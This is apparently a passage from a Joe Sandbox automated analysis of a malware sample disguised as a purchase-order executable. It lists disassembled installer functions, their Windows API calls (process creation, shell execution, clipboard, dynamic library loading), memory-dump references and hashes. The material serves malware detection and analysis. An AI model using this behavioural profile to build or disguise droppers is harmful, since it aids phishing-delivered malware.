                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                            Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                            • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                            • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                            • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                            Function 004058E6 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                            • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                            • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                            • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                            Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                              • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                              • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,?), ref: 00406756
                                              • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            • Opcode ID: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                            • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                            • Opcode Fuzzy Hash: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
                                            • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E
                                            Function 73CF121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: 10a6443911b160220a1c5b77e52f245b7bae4ec7890d52492dbe73ea1f8ad13b
                                            • Instruction ID: 9c76b0354904bd050012df8c63b4a1be5ccb8ff4eb572635f793b0af42bde32c
                                            • Opcode Fuzzy Hash: 10a6443911b160220a1c5b77e52f245b7bae4ec7890d52492dbe73ea1f8ad13b
                                            • Instruction Fuzzy Hash: 35B01273A00041FFEE00EB65CC06F303264D740300F104000F609C4140C120CC008638

                                            Non-executed Functions

                                            Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                            • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                            • GetClientRect.USER32(?,?), ref: 0040550B
                                            • GetSystemMetrics.USER32(00000002), ref: 00405512
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                            • ShowWindow.USER32(?,?), ref: 004055AE
                                            • GetDlgItem.USER32(?,?), ref: 004055CF
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                            • GetDlgItem.USER32(?,?), ref: 004054DD
                                              • Part of subcall function 00404266: SendMessageW.USER32(?,?,00000001,00404091), ref: 00404274
                                            • GetDlgItem.USER32(?,?), ref: 00405621
                                            • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                            • CloseHandle.KERNEL32(00000000), ref: 00405636
                                            • ShowWindow.USER32(00000000), ref: 0040565A
                                            • ShowWindow.USER32(?,?), ref: 0040565F
                                            • ShowWindow.USER32(?), ref: 004056A9
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                            • CreatePopupMenu.USER32 ref: 004056EE
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                            • GetWindowRect.USER32(?,?), ref: 00405722
                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040573B
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                            • OpenClipboard.USER32(00000000), ref: 00405783
                                            • EmptyClipboard.USER32 ref: 00405789
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                            • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                            • CloseClipboard.USER32 ref: 004057E4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                            • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                            • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                            • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                            Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                            • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                            • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                            • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                              • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,?,004048DE), ref: 00405917
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065B1
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004065C0
                                              • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065C5
                                              • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 004065D8
                                            • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                              • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                              • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                              • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call
                                            • API String ID: 2624150263-1648024196
                                            • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                            • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                            • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                            • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                            Function 73CF1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 73CF121B: GlobalAlloc.KERNELBASE(?,?,73CF123B,?,73CF12DF,00000019,73CF11BE,-000000A0), ref: 73CF1225
                                            • GlobalAlloc.KERNEL32(?,00001CA4), ref: 73CF1C6F
                                            • lstrcpyW.KERNEL32(00000008,?), ref: 73CF1CB7
                                            • lstrcpyW.KERNEL32(00000808,?), ref: 73CF1CC1
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1CD4
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DB6
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DBB
                                            • GlobalFree.KERNEL32(?), ref: 73CF1DC0
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1FAA
                                            • lstrcpyW.KERNEL32(?,?), ref: 73CF2144
                                            • GetModuleHandleW.KERNEL32(00000008), ref: 73CF21B9
                                            • LoadLibraryW.KERNEL32(00000008), ref: 73CF21CA
                                            • GetProcAddress.KERNEL32(?,?), ref: 73CF2224
                                            • lstrlenW.KERNEL32(00000808), ref: 73CF223E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                            • String ID:
                                            • API String ID: 245916457-0
                                            • Opcode ID: c66c78bd875470a3b1e882b990741b54c8fbdd6e49a621beae06960c5e6cf1e6
                                            • Instruction ID: bc62b8093c4b0862872354336d53c618b4e664e6652bb516c81e2591cc44900d
                                            • Opcode Fuzzy Hash: c66c78bd875470a3b1e882b990741b54c8fbdd6e49a621beae06960c5e6cf1e6
                                            • Instruction Fuzzy Hash: CF22BA77C0024BEBDB92DFA5C9807EEBBB4FF04315F51452ED1A6EA280D7709A818B50
                                            Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: p!C$p!C
                                            • API String ID: 0-3125587631
                                            • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                            • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                            • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                            • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                            Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                            • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                            • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                            • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                            Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                            • Instruction ID: dcc2b246e3e85771245330633344c28aad3b6f2e7effc766acd5add5c88cb85a
                                            • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                            • Instruction Fuzzy Hash: DBE18A7190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                            Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                            • GetDlgItem.USER32(?,?), ref: 004044A2
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                            • GetSysColor.USER32(?), ref: 004044D0
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                            • lstrlenW.KERNEL32(?), ref: 004044F1
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                            • SendMessageW.USER32(00000000), ref: 00404573
                                            • GetDlgItem.USER32(?,?), ref: 0040459E
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                            • SetCursor.USER32(00000000), ref: 004045F2
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                            • SetCursor.USER32(00000000), ref: 0040460E
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                            • SendMessageW.USER32(?,00000000,00000000), ref: 0040464F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Call$N$gC@
                                            • API String ID: 3103080414-2733886405
                                            • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
